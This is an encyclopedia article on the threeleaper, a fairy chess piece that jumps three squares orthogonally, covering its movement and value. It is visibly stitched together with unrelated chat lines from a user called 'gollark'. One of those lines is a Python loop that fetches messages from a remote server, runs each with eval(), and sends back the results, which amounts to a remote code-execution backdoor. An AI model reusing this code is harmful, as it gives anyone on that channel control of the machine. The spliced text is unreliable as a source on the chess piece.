Threeleaper
A threeleaper or trébuchet is a fairy chess piece that jumps three squares orthogonally (the directions a chess rook can move), leaping over any intermediate piece. Below, it is given the symbol H from Betza notation.
a | b | c | d | e | f | g | h | ||
8 | 8 | ||||||||
7 | 7 | ||||||||
6 | 6 | ||||||||
5 | 5 | ||||||||
4 | 4 | ||||||||
3 | 3 | ||||||||
2 | 2 | ||||||||
1 | 1 | ||||||||
a | b | c | d | e | f | g | h |
Value
The threeleaper by itself is not much more powerful than a pawn, but as an additional power to other pieces it is worth about half a knight. Its value as a piece by itself is severely compromised by its being only being able to reach a ninth of the squares on any size of chessboard; combining it with other pieces usually masks this weakness to some extent.
gollark: It's very secure.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```Using the new SPUDNET-HTTP API.
gollark: Make it continuously ping osmarks.net so you know what it's up to.
gollark: Routers can do this.
gollark: Or give it a static IP, even?!
References
- Ideal and Practical Values (part 4): Odds and Ends by Ralph Betza, The Chess Variant Pages
- Augmented [Different] Knights by Ralph Betza, The Chess Variant Pages
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.